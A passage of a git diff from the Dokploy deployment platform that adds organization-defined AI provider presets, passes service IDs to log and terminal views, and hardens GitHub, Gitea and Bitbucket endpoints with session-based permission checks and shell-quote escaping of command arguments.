||||||
: api.ai.create.useMutation();
|
: api.ai.create.useMutation();
|
||||||
@@ -210,7 +215,9 @@ export const HandleAi = ({ aiId }: Props) => {
|
|||||||
<FormLabel>Provider</FormLabel>
|
<FormLabel>Provider</FormLabel>
|
||||||
<Select
|
<Select
|
||||||
onValueChange={(value) => {
|
onValueChange={(value) => {
|
||||||
const provider = AI_PROVIDERS.find((p) => p.apiUrl === value);
|
const provider = providerOptions.find(
|
||||||
|
(p) => p.apiUrl === value,
|
||||||
|
);
|
||||||
if (provider) {
|
if (provider) {
|
||||||
form.setValue("name", provider.name);
|
form.setValue("name", provider.name);
|
||||||
form.setValue("apiUrl", provider.apiUrl);
|
form.setValue("apiUrl", provider.apiUrl);
|
||||||
@@ -222,15 +229,20 @@ export const HandleAi = ({ aiId }: Props) => {
|
|||||||
<SelectValue placeholder="Select a provider preset..." />
|
<SelectValue placeholder="Select a provider preset..." />
|
||||||
</SelectTrigger>
|
</SelectTrigger>
|
||||||
<SelectContent>
|
<SelectContent>
|
||||||
{AI_PROVIDERS.map((provider) => (
|
{providerOptions.map((provider) => (
|
||||||
<SelectItem key={provider.apiUrl} value={provider.apiUrl}>
|
<SelectItem
|
||||||
|
key={`${provider.name}-${provider.apiUrl}`}
|
||||||
|
value={provider.apiUrl}
|
||||||
|
>
|
||||||
{provider.name}
|
{provider.name}
|
||||||
</SelectItem>
|
</SelectItem>
|
||||||
))}
|
))}
|
||||||
</SelectContent>
|
</SelectContent>
|
||||||
</Select>
|
</Select>
|
||||||
<p className="text-[0.8rem] text-muted-foreground">
|
<p className="text-[0.8rem] text-muted-foreground">
|
||||||
Quick-fill provider name and URL, or configure manually below
|
{hasCustomProviders
|
||||||
|
? "Select one of the providers defined by your organization"
|
||||||
|
: "Quick-fill provider name and URL, or configure manually below"}
|
||||||
</p>
|
</p>
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
@@ -260,6 +272,7 @@ export const HandleAi = ({ aiId }: Props) => {
|
|||||||
<FormControl>
|
<FormControl>
|
||||||
<Input
|
<Input
|
||||||
placeholder="https://api.openai.com/v1"
|
placeholder="https://api.openai.com/v1"
|
||||||
|
disabled={hasCustomProviders}
|
||||||
{...field}
|
{...field}
|
||||||
onChange={(e) => {
|
onChange={(e) => {
|
||||||
field.onChange(e);
|
field.onChange(e);
|
||||||
@@ -271,7 +284,9 @@ export const HandleAi = ({ aiId }: Props) => {
|
|||||||
/>
|
/>
|
||||||
</FormControl>
|
</FormControl>
|
||||||
<FormDescription>
|
<FormDescription>
|
||||||
The base URL for your AI provider's API
|
{hasCustomProviders
|
||||||
|
? "The API URL is defined by your organization's providers"
|
||||||
|
: "The base URL for your AI provider's API"}
|
||||||
</FormDescription>
|
</FormDescription>
|
||||||
<FormMessage />
|
<FormMessage />
|
||||||
</FormItem>
|
</FormItem>
|
||||||
|
|||||||
@@ -100,7 +100,7 @@ export const Enable2FA = () => {
|
|||||||
});
|
});
|
||||||
|
|
||||||
if (result.error) {
|
if (result.error) {
|
||||||
if (result.error.code === "INVALID_TWO_FACTOR_AUTHENTICATION") {
|
if (result.error.code === "INVALID_CODE") {
|
||||||
toast.error("Invalid verification code");
|
toast.error("Invalid verification code");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -40,6 +40,7 @@ interface Props {
|
|||||||
children?: React.ReactNode;
|
children?: React.ReactNode;
|
||||||
serverId?: string;
|
serverId?: string;
|
||||||
appType?: "stack" | "docker-compose";
|
appType?: "stack" | "docker-compose";
|
||||||
|
serviceId?: string;
|
||||||
}
|
}
|
||||||
|
|
||||||
export const DockerTerminalModal = ({
|
export const DockerTerminalModal = ({
|
||||||
@@ -47,6 +48,7 @@ export const DockerTerminalModal = ({
|
|||||||
appName,
|
appName,
|
||||||
serverId,
|
serverId,
|
||||||
appType,
|
appType,
|
||||||
|
serviceId,
|
||||||
}: Props) => {
|
}: Props) => {
|
||||||
const { data, isPending } = api.docker.getContainersByAppNameMatch.useQuery(
|
const { data, isPending } = api.docker.getContainersByAppNameMatch.useQuery(
|
||||||
{
|
{
|
||||||
@@ -131,6 +133,7 @@ export const DockerTerminalModal = ({
|
|||||||
serverId={serverId || ""}
|
serverId={serverId || ""}
|
||||||
id="terminal"
|
id="terminal"
|
||||||
containerId={containerId || "select-a-container"}
|
containerId={containerId || "select-a-container"}
|
||||||
|
serviceId={serviceId}
|
||||||
/>
|
/>
|
||||||
<Dialog open={confirmDialogOpen} onOpenChange={setConfirmDialogOpen}>
|
<Dialog open={confirmDialogOpen} onOpenChange={setConfirmDialogOpen}>
|
||||||
<DialogContent onEscapeKeyDown={(event) => event.preventDefault()}>
|
<DialogContent onEscapeKeyDown={(event) => event.preventDefault()}>
|
||||||
|
|||||||
@@ -648,7 +648,7 @@ function SidebarLogo() {
|
|||||||
</SidebarMenuButton>
|
</SidebarMenuButton>
|
||||||
</DropdownMenuTrigger>
|
</DropdownMenuTrigger>
|
||||||
<DropdownMenuContent
|
<DropdownMenuContent
|
||||||
className="rounded-lg max-h-[min(70vh,28rem)] flex flex-col"
|
className="w-64 rounded-lg max-h-[min(70vh,28rem)] flex flex-col"
|
||||||
align="start"
|
align="start"
|
||||||
side={isMobile ? "bottom" : "right"}
|
side={isMobile ? "bottom" : "right"}
|
||||||
sideOffset={4}
|
sideOffset={4}
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
{
|
{
|
||||||
"name": "dokploy",
|
"name": "dokploy",
|
||||||
"version": "v0.29.12",
|
"version": "v0.29.13",
|
||||||
"private": true,
|
"private": true,
|
||||||
"license": "Apache-2.0",
|
"license": "Apache-2.0",
|
||||||
"type": "module",
|
"type": "module",
|
||||||
|
|||||||
@@ -1,5 +1,6 @@
|
|||||||
import { createGithub } from "@dokploy/server";
|
import { createGithub, validateRequest } from "@dokploy/server";
|
||||||
import { db } from "@dokploy/server/db";
|
import { db } from "@dokploy/server/db";
|
||||||
|
import { hasPermission } from "@dokploy/server/services/permission";
|
||||||
import { eq } from "drizzle-orm";
|
import { eq } from "drizzle-orm";
|
||||||
import type { NextApiRequest, NextApiResponse } from "next";
|
import type { NextApiRequest, NextApiResponse } from "next";
|
||||||
import { Octokit } from "octokit";
|
import { Octokit } from "octokit";
|
||||||
@@ -21,18 +22,22 @@ export default async function handler(
|
|||||||
if (!code) {
|
if (!code) {
|
||||||
return res.status(400).json({ error: "Missing code parameter" });
|
return res.status(400).json({ error: "Missing code parameter" });
|
||||||
}
|
}
|
||||||
const [action, ...rest] = state?.split(":");
|
|
||||||
// For gh_init: rest[0] = organizationId, rest[1] = userId
|
|
||||||
// For gh_setup: rest[0] = githubProviderId
|
|
||||||
|
|
||||||
if (action === "gh_init") {
|
const { user, session } = await validateRequest(req);
|
||||||
const organizationId = rest[0];
|
if (!user || !session?.activeOrganizationId) {
|
||||||
const userId = rest[1] || (req.query.userId as string);
|
return res.status(401).json({ error: "Unauthorized" });
|
||||||
|
}
|
||||||
|
const ctx = {
|
||||||
|
user: { id: user.id },
|
||||||
|
session: { activeOrganizationId: session.activeOrganizationId },
|
||||||
|
};
|
||||||
|
|
||||||
if (!userId) {
|
const [action] = state?.split(":") ?? [];
|
||||||
return res.status(400).json({ error: "Missing userId parameter" });
|
if (!(await hasPermission(ctx, { gitProviders: ["create"] }))) {
|
||||||
|
return res.status(403).json({ error: "Forbidden" });
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if (action === "gh_init") {
|
||||||
const octokit = new Octokit({});
|
const octokit = new Octokit({});
|
||||||
const { data } = await octokit.request(
|
const { data } = await octokit.request(
|
||||||
"POST /app-manifests/{code}/conversions",
|
"POST /app-manifests/{code}/conversions",
|
||||||
@@ -51,16 +56,32 @@ export default async function handler(
|
|||||||
githubWebhookSecret: data.webhook_secret,
|
githubWebhookSecret: data.webhook_secret,
|
||||||
githubPrivateKey: data.pem,
|
githubPrivateKey: data.pem,
|
||||||
},
|
},
|
||||||
organizationId as string,
|
session.activeOrganizationId,
|
||||||
userId,
|
user.id,
|
||||||
);
|
);
|
||||||
} else if (action === "gh_setup") {
|
} else if (action === "gh_setup") {
|
||||||
|
const githubId = state?.split(":")[1];
|
||||||
|
if (!githubId) {
|
||||||
|
return res.status(400).json({ error: "Missing github provider id" });
|
||||||
|
}
|
||||||
|
|
||||||
|
const provider = await db.query.github.findFirst({
|
||||||
|
where: eq(github.githubId, githubId),
|
||||||
|
with: { gitProvider: true },
|
||||||
|
});
|
||||||
|
if (
|
||||||
|
!provider ||
|
||||||
|
provider.gitProvider.organizationId !== session.activeOrganizationId
|
||||||
|
) {
|
||||||
|
return res.status(404).json({ error: "Github provider not found" });
|
||||||
|
}
|
||||||
|
|
||||||
await db
|
await db
|
||||||
.update(github)
|
.update(github)
|
||||||
.set({
|
.set({
|
||||||
githubInstallationId: installation_id,
|
githubInstallationId: installation_id,
|
||||||
})
|
})
|
||||||
.where(eq(github.githubId, rest[0] as string))
|
.where(eq(github.githubId, githubId))
|
||||||
.returning();
|
.returning();
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -347,6 +347,7 @@ const Service = (
|
|||||||
<ShowDockerLogs
|
<ShowDockerLogs
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
|
serviceId={data?.applicationId}
|
||||||
/>
|
/>
|
||||||
</div>
|
</div>
|
||||||
</TabsContent>
|
</TabsContent>
|
||||||
|
|||||||
@@ -312,6 +312,7 @@ const Service = (
|
|||||||
serverId={data?.serverId || undefined}
|
serverId={data?.serverId || undefined}
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
appType={data?.composeType || "docker-compose"}
|
appType={data?.composeType || "docker-compose"}
|
||||||
|
serviceId={data?.composeId}
|
||||||
/>
|
/>
|
||||||
</div>
|
</div>
|
||||||
</TabsContent>
|
</TabsContent>
|
||||||
@@ -380,11 +381,13 @@ const Service = (
|
|||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
appType={data?.composeType || "docker-compose"}
|
appType={data?.composeType || "docker-compose"}
|
||||||
|
serviceId={data?.composeId}
|
||||||
/>
|
/>
|
||||||
) : (
|
) : (
|
||||||
<ShowDockerLogsStack
|
<ShowDockerLogsStack
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.composeId}
|
||||||
/>
|
/>
|
||||||
)}
|
)}
|
||||||
</div>
|
</div>
|
||||||
|
|||||||
@@ -269,6 +269,7 @@ const Libsql = (
|
|||||||
<ShowDockerLogs
|
<ShowDockerLogs
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.libsqlId}
|
||||||
/>
|
/>
|
||||||
</div>
|
</div>
|
||||||
</TabsContent>
|
</TabsContent>
|
||||||
|
|||||||
@@ -299,6 +299,7 @@ const Mariadb = (
|
|||||||
<ShowDockerLogs
|
<ShowDockerLogs
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.mariadbId}
|
||||||
/>
|
/>
|
||||||
</div>
|
</div>
|
||||||
</TabsContent>
|
</TabsContent>
|
||||||
|
|||||||
@@ -299,6 +299,7 @@ const Mongo = (
|
|||||||
<ShowDockerLogs
|
<ShowDockerLogs
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.mongoId}
|
||||||
/>
|
/>
|
||||||
</div>
|
</div>
|
||||||
</TabsContent>
|
</TabsContent>
|
||||||
|
|||||||
@@ -276,6 +276,7 @@ const MySql = (
|
|||||||
<ShowDockerLogs
|
<ShowDockerLogs
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.mysqlId}
|
||||||
/>
|
/>
|
||||||
</div>
|
</div>
|
||||||
</TabsContent>
|
</TabsContent>
|
||||||
|
|||||||
@@ -284,6 +284,7 @@ const Postgresql = (
|
|||||||
<ShowDockerLogs
|
<ShowDockerLogs
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.postgresId}
|
||||||
/>
|
/>
|
||||||
</div>
|
</div>
|
||||||
</TabsContent>
|
</TabsContent>
|
||||||
|
|||||||
@@ -297,6 +297,7 @@ const Redis = (
|
|||||||
<ShowDockerLogs
|
<ShowDockerLogs
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.redisId}
|
||||||
/>
|
/>
|
||||||
</div>
|
</div>
|
||||||
</TabsContent>
|
</TabsContent>
|
||||||
|
|||||||
@@ -1,6 +1,7 @@
|
|||||||
import { IS_CLOUD } from "@dokploy/server/constants";
|
import { IS_CLOUD } from "@dokploy/server/constants";
|
||||||
import {
|
import {
|
||||||
apiCreateAi,
|
apiCreateAi,
|
||||||
|
apiSaveAiCustomProviders,
|
||||||
apiUpdateAi,
|
apiUpdateAi,
|
||||||
deploySuggestionSchema,
|
deploySuggestionSchema,
|
||||||
} from "@dokploy/server/db/schema/ai";
|
} from "@dokploy/server/db/schema/ai";
|
||||||
@@ -13,7 +14,9 @@ import {
|
|||||||
deleteAiSettings,
|
deleteAiSettings,
|
||||||
getAiSettingById,
|
getAiSettingById,
|
||||||
getAiSettingsByOrganizationId,
|
getAiSettingsByOrganizationId,
|
||||||
|
getCustomAiProviders,
|
||||||
saveAiSettings,
|
saveAiSettings,
|
||||||
|
saveCustomAiProviders,
|
||||||
suggestVariants,
|
suggestVariants,
|
||||||
} from "@dokploy/server/services/ai";
|
} from "@dokploy/server/services/ai";
|
||||||
import { createComposeByTemplate } from "@dokploy/server/services/compose";
|
import { createComposeByTemplate } from "@dokploy/server/services/compose";
|
||||||
@@ -200,6 +203,19 @@ export const aiRouter = createTRPCRouter({
|
|||||||
return await deleteAiSettings(input.aiId);
|
return await deleteAiSettings(input.aiId);
|
||||||
}),
|
}),
|
||||||
|
|
||||||
|
getCustomProviders: protectedProcedure.query(async ({ ctx }) => {
|
||||||
|
return await getCustomAiProviders(ctx.session.activeOrganizationId);
|
||||||
|
}),
|
||||||
|
|
||||||
|
saveCustomProviders: adminProcedure
|
||||||
|
.input(apiSaveAiCustomProviders)
|
||||||
|
.mutation(async ({ ctx, input }) => {
|
||||||
|
return await saveCustomAiProviders(
|
||||||
|
ctx.session.activeOrganizationId,
|
||||||
|
input.providers,
|
||||||
|
);
|
||||||
|
}),
|
||||||
|
|
||||||
getEnabledProviders: protectedProcedure.query(async ({ ctx }) => {
|
getEnabledProviders: protectedProcedure.query(async ({ ctx }) => {
|
||||||
const settings = await getAiSettingsByOrganizationId(
|
const settings = await getAiSettingsByOrganizationId(
|
||||||
ctx.session.activeOrganizationId,
|
ctx.session.activeOrganizationId,
|
||||||
|
|||||||
@@ -49,6 +49,7 @@ import {
|
|||||||
restoreWebServerBackup,
|
restoreWebServerBackup,
|
||||||
} from "@dokploy/server/utils/restore";
|
} from "@dokploy/server/utils/restore";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import { z } from "zod";
|
import { z } from "zod";
|
||||||
import {
|
import {
|
||||||
createTRPCRouter,
|
createTRPCRouter,
|
||||||
@@ -510,7 +511,7 @@ export const backupRouter = createTRPCRouter({
|
|||||||
: input.search;
|
: input.search;
|
||||||
|
|
||||||
const searchPath = baseDir ? `${bucketPath}/${baseDir}` : bucketPath;
|
const searchPath = baseDir ? `${bucketPath}/${baseDir}` : bucketPath;
|
||||||
const listCommand = `rclone lsjson ${rcloneFlags.join(" ")} "${searchPath}" --no-mimetype --no-modtime 2>/dev/null`;
|
const listCommand = `rclone lsjson ${rcloneFlags.join(" ")} ${quote([searchPath])} --no-mimetype --no-modtime 2>/dev/null`;
|
||||||
|
|
||||||
let stdout = "";
|
let stdout = "";
|
||||||
|
|
||||||
|
|||||||
@@ -1,4 +1,5 @@
|
|||||||
import {
|
import {
|
||||||
|
assertGitProviderAccess,
|
||||||
createBitbucket,
|
createBitbucket,
|
||||||
findBitbucketById,
|
findBitbucketById,
|
||||||
getAccessibleGitProviderIds,
|
getAccessibleGitProviderIds,
|
||||||
@@ -51,8 +52,10 @@ export const bitbucketRouter = createTRPCRouter({
|
|||||||
}),
|
}),
|
||||||
one: protectedProcedure
|
one: protectedProcedure
|
||||||
.input(apiFindOneBitbucket)
|
.input(apiFindOneBitbucket)
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
return await findBitbucketById(input.bitbucketId);
|
const bitbucket = await findBitbucketById(input.bitbucketId);
|
||||||
|
await assertGitProviderAccess(ctx.session, bitbucket.gitProvider);
|
||||||
|
return bitbucket;
|
||||||
}),
|
}),
|
||||||
bitbucketProviders: protectedProcedure.query(async ({ ctx }) => {
|
bitbucketProviders: protectedProcedure.query(async ({ ctx }) => {
|
||||||
const accessibleIds = await getAccessibleGitProviderIds(ctx.session);
|
const accessibleIds = await getAccessibleGitProviderIds(ctx.session);
|
||||||
@@ -78,18 +81,26 @@ export const bitbucketRouter = createTRPCRouter({
|
|||||||
|
|
||||||
getBitbucketRepositories: protectedProcedure
|
getBitbucketRepositories: protectedProcedure
|
||||||
.input(apiFindOneBitbucket)
|
.input(apiFindOneBitbucket)
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
|
const bitbucket = await findBitbucketById(input.bitbucketId);
|
||||||
|
await assertGitProviderAccess(ctx.session, bitbucket.gitProvider);
|
||||||
return await getBitbucketRepositories(input.bitbucketId);
|
return await getBitbucketRepositories(input.bitbucketId);
|
||||||
}),
|
}),
|
||||||
getBitbucketBranches: protectedProcedure
|
getBitbucketBranches: protectedProcedure
|
||||||
.input(apiFindBitbucketBranches)
|
.input(apiFindBitbucketBranches)
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
|
if (input.bitbucketId) {
|
||||||
|
const bitbucket = await findBitbucketById(input.bitbucketId);
|
||||||
|
await assertGitProviderAccess(ctx.session, bitbucket.gitProvider);
|
||||||
|
}
|
||||||
return await getBitbucketBranches(input);
|
return await getBitbucketBranches(input);
|
||||||
}),
|
}),
|
||||||
testConnection: protectedProcedure
|
testConnection: protectedProcedure
|
||||||
.input(apiBitbucketTestConnection)
|
.input(apiBitbucketTestConnection)
|
||||||
.mutation(async ({ input }) => {
|
.mutation(async ({ input, ctx }) => {
|
||||||
try {
|
try {
|
||||||
|
const bitbucket = await findBitbucketById(input.bitbucketId);
|
||||||
|
await assertGitProviderAccess(ctx.session, bitbucket.gitProvider);
|
||||||
const result = await testBitbucketConnection(input);
|
const result = await testBitbucketConnection(input);
|
||||||
|
|
||||||
return `Found ${result} repositories`;
|
return `Found ${result} repositories`;
|
||||||
|
|||||||
@@ -6,6 +6,7 @@ import {
|
|||||||
getRemoteDocker,
|
getRemoteDocker,
|
||||||
} from "@dokploy/server";
|
} from "@dokploy/server";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import { z } from "zod";
|
import { z } from "zod";
|
||||||
import { audit } from "@/server/api/utils/audit";
|
import { audit } from "@/server/api/utils/audit";
|
||||||
import { getLocalServerIp } from "@/server/wss/terminal";
|
import { getLocalServerIp } from "@/server/wss/terminal";
|
||||||
@@ -51,8 +52,8 @@ export const clusterRouter = createTRPCRouter({
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
try {
|
try {
|
||||||
const drainCommand = `docker node update --availability drain ${input.nodeId}`;
|
const drainCommand = `docker node update --availability drain ${quote([input.nodeId])}`;
|
||||||
const removeCommand = `docker node rm ${input.nodeId} --force`;
|
const removeCommand = `docker node rm ${quote([input.nodeId])} --force`;
|
||||||
|
|
||||||
if (input.serverId) {
|
if (input.serverId) {
|
||||||
await execAsyncRemote(input.serverId, drainCommand);
|
await execAsyncRemote(input.serverId, drainCommand);
|
||||||
|
|||||||
@@ -10,6 +10,7 @@ import {
|
|||||||
import { db } from "@dokploy/server/db";
|
import { db } from "@dokploy/server/db";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { desc, eq } from "drizzle-orm";
|
import { desc, eq } from "drizzle-orm";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import { createTRPCRouter, withPermission } from "@/server/api/trpc";
|
import { createTRPCRouter, withPermission } from "@/server/api/trpc";
|
||||||
import { audit } from "@/server/api/utils/audit";
|
import { audit } from "@/server/api/utils/audit";
|
||||||
import {
|
import {
|
||||||
@@ -58,10 +59,10 @@ export const destinationRouter = createTRPCRouter({
|
|||||||
} = input;
|
} = input;
|
||||||
try {
|
try {
|
||||||
const rcloneFlags = [
|
const rcloneFlags = [
|
||||||
`--s3-access-key-id="${accessKey}"`,
|
`--s3-access-key-id=${quote([accessKey])}`,
|
||||||
`--s3-secret-access-key="${secretAccessKey}"`,
|
`--s3-secret-access-key=${quote([secretAccessKey])}`,
|
||||||
`--s3-region="${region}"`,
|
`--s3-region=${quote([region])}`,
|
||||||
`--s3-endpoint="${endpoint}"`,
|
`--s3-endpoint=${quote([endpoint])}`,
|
||||||
"--s3-no-check-bucket",
|
"--s3-no-check-bucket",
|
||||||
"--s3-force-path-style",
|
"--s3-force-path-style",
|
||||||
"--retries 1",
|
"--retries 1",
|
||||||
@@ -70,13 +71,13 @@ export const destinationRouter = createTRPCRouter({
|
|||||||
"--contimeout 5s",
|
"--contimeout 5s",
|
||||||
];
|
];
|
||||||
if (provider) {
|
if (provider) {
|
||||||
rcloneFlags.unshift(`--s3-provider="${provider}"`);
|
rcloneFlags.unshift(`--s3-provider=${quote([provider])}`);
|
||||||
}
|
}
|
||||||
if (additionalFlags?.length) {
|
if (additionalFlags?.length) {
|
||||||
rcloneFlags.push(...additionalFlags);
|
rcloneFlags.push(...additionalFlags);
|
||||||
}
|
}
|
||||||
const rcloneDestination = `:s3:${bucket}`;
|
const rcloneDestination = `:s3:${bucket}`;
|
||||||
const rcloneCommand = `rclone ls ${rcloneFlags.join(" ")} "${rcloneDestination}"`;
|
const rcloneCommand = `rclone ls ${rcloneFlags.join(" ")} ${quote([rcloneDestination])}`;
|
||||||
|
|
||||||
if (IS_CLOUD && !input.serverId) {
|
if (IS_CLOUD && !input.serverId) {
|
||||||
throw new TRPCError({
|
throw new TRPCError({
|
||||||
|
|||||||
@@ -1,4 +1,5 @@
|
|||||||
import {
|
import {
|
||||||
|
assertGitProviderAccess,
|
||||||
createGitea,
|
createGitea,
|
||||||
findGiteaById,
|
findGiteaById,
|
||||||
getAccessibleGitProviderIds,
|
getAccessibleGitProviderIds,
|
||||||
@@ -53,8 +54,12 @@ export const giteaRouter = createTRPCRouter({
|
|||||||
}
|
}
|
||||||
}),
|
}),
|
||||||
|
|
||||||
one: protectedProcedure.input(apiFindOneGitea).query(async ({ input }) => {
|
one: protectedProcedure
|
||||||
return await findGiteaById(input.giteaId);
|
.input(apiFindOneGitea)
|
||||||
|
.query(async ({ input, ctx }) => {
|
||||||
|
const gitea = await findGiteaById(input.giteaId);
|
||||||
|
await assertGitProviderAccess(ctx.session, gitea.gitProvider);
|
||||||
|
return gitea;
|
||||||
}),
|
}),
|
||||||
|
|
||||||
giteaProviders: protectedProcedure.query(async ({ ctx }) => {
|
giteaProviders: protectedProcedure.query(async ({ ctx }) => {
|
||||||
@@ -89,7 +94,7 @@ export const giteaRouter = createTRPCRouter({
|
|||||||
|
|
||||||
getGiteaRepositories: protectedProcedure
|
getGiteaRepositories: protectedProcedure
|
||||||
.input(apiFindOneGitea)
|
.input(apiFindOneGitea)
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
const { giteaId } = input;
|
const { giteaId } = input;
|
||||||
|
|
||||||
if (!giteaId) {
|
if (!giteaId) {
|
||||||
@@ -99,6 +104,9 @@ export const giteaRouter = createTRPCRouter({
|
|||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
|
const gitea = await findGiteaById(giteaId);
|
||||||
|
await assertGitProviderAccess(ctx.session, gitea.gitProvider);
|
||||||
|
|
||||||
try {
|
try {
|
||||||
const repositories = await getGiteaRepositories(giteaId);
|
const repositories = await getGiteaRepositories(giteaId);
|
||||||
return repositories;
|
return repositories;
|
||||||
@@ -113,7 +121,7 @@ export const giteaRouter = createTRPCRouter({
|
|||||||
|
|
||||||
getGiteaBranches: protectedProcedure
|
getGiteaBranches: protectedProcedure
|
||||||
.input(apiFindGiteaBranches)
|
.input(apiFindGiteaBranches)
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
const { giteaId, owner, repositoryName } = input;
|
const { giteaId, owner, repositoryName } = input;
|
||||||
|
|
||||||
if (!giteaId || !owner || !repositoryName) {
|
if (!giteaId || !owner || !repositoryName) {
|
||||||
@@ -124,6 +132,9 @@ export const giteaRouter = createTRPCRouter({
|
|||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
|
const gitea = await findGiteaById(giteaId);
|
||||||
|
await assertGitProviderAccess(ctx.session, gitea.gitProvider);
|
||||||
|
|
||||||
try {
|
try {
|
||||||
return await getGiteaBranches({
|
return await getGiteaBranches({
|
||||||
giteaId,
|
giteaId,
|
||||||
@@ -141,9 +152,12 @@ export const giteaRouter = createTRPCRouter({
|
|||||||
|
|
||||||
testConnection: protectedProcedure
|
testConnection: protectedProcedure
|
||||||
.input(apiGiteaTestConnection)
|
.input(apiGiteaTestConnection)
|
||||||
.mutation(async ({ input }) => {
|
.mutation(async ({ input, ctx }) => {
|
||||||
const giteaId = input.giteaId ?? "";
|
const giteaId = input.giteaId ?? "";
|
||||||
|
|
||||||
|
const gitea = await findGiteaById(giteaId);
|
||||||
|
await assertGitProviderAccess(ctx.session, gitea.gitProvider);
|
||||||
|
|
||||||
try {
|
try {
|
||||||
const result = await testGiteaConnection({
|
const result = await testGiteaConnection({
|
||||||
giteaId,
|
giteaId,
|
||||||
|
|||||||
@@ -1,4 +1,5 @@
|
|||||||
import {
|
import {
|
||||||
|
assertGitProviderAccess,
|
||||||
findGithubById,
|
findGithubById,
|
||||||
getAccessibleGitProviderIds,
|
getAccessibleGitProviderIds,
|
||||||
getGithubBranches,
|
getGithubBranches,
|
||||||
@@ -22,17 +23,27 @@ import {
|
|||||||
} from "@/server/db/schema";
|
} from "@/server/db/schema";
|
||||||
|
|
||||||
export const githubRouter = createTRPCRouter({
|
export const githubRouter = createTRPCRouter({
|
||||||
one: protectedProcedure.input(apiFindOneGithub).query(async ({ input }) => {
|
one: protectedProcedure
|
||||||
return await findGithubById(input.githubId);
|
.input(apiFindOneGithub)
|
||||||
|
.query(async ({ input, ctx }) => {
|
||||||
|
const github = await findGithubById(input.githubId);
|
||||||
|
await assertGitProviderAccess(ctx.session, github.gitProvider);
|
||||||
|
return github;
|
||||||
}),
|
}),
|
||||||
getGithubRepositories: protectedProcedure
|
getGithubRepositories: protectedProcedure
|
||||||
.input(apiFindOneGithub)
|
.input(apiFindOneGithub)
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
|
const github = await findGithubById(input.githubId);
|
||||||
|
await assertGitProviderAccess(ctx.session, github.gitProvider);
|
||||||
return await getGithubRepositories(input.githubId);
|
return await getGithubRepositories(input.githubId);
|
||||||
}),
|
}),
|
||||||
getGithubBranches: protectedProcedure
|
getGithubBranches: protectedProcedure
|
||||||
.input(apiFindGithubBranches)
|
.input(apiFindGithubBranches)
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
|
if (input.githubId) {
|
||||||
|
const github = await findGithubById(input.githubId);
|
||||||
|
await assertGitProviderAccess(ctx.session, github.gitProvider);
|
||||||
|
}
|
||||||
return await getGithubBranches(input);
|
return await getGithubBranches(input);
|
||||||
}),
|
}),
|
||||||
githubProviders: protectedProcedure.query(async ({ ctx }) => {
|
githubProviders: protectedProcedure.query(async ({ ctx }) => {
|
||||||
@@ -67,8 +78,10 @@ export const githubRouter = createTRPCRouter({
|
|||||||
|
|
||||||
testConnection: protectedProcedure
|
testConnection: protectedProcedure
|
||||||
.input(apiFindOneGithub)
|
.input(apiFindOneGithub)
|
||||||
.mutation(async ({ input }) => {
|
.mutation(async ({ input, ctx }) => {
|
||||||
try {
|
try {
|
||||||
|
const github = await findGithubById(input.githubId);
|
||||||
|
await assertGitProviderAccess(ctx.session, github.gitProvider);
|
||||||
const result = await getGithubRepositories(input.githubId);
|
const result = await getGithubRepositories(input.githubId);
|
||||||
return `Found ${result.length} repositories`;
|
return `Found ${result.length} repositories`;
|
||||||
} catch (err) {
|
} catch (err) {
|
||||||
|
|||||||
@@ -1,4 +1,5 @@
|
|||||||
import {
|
import {
|
||||||
|
assertGitProviderAccess,
|
||||||
createGitlab,
|
createGitlab,
|
||||||
findGitlabById,
|
findGitlabById,
|
||||||
getAccessibleGitProviderIds,
|
getAccessibleGitProviderIds,
|
||||||
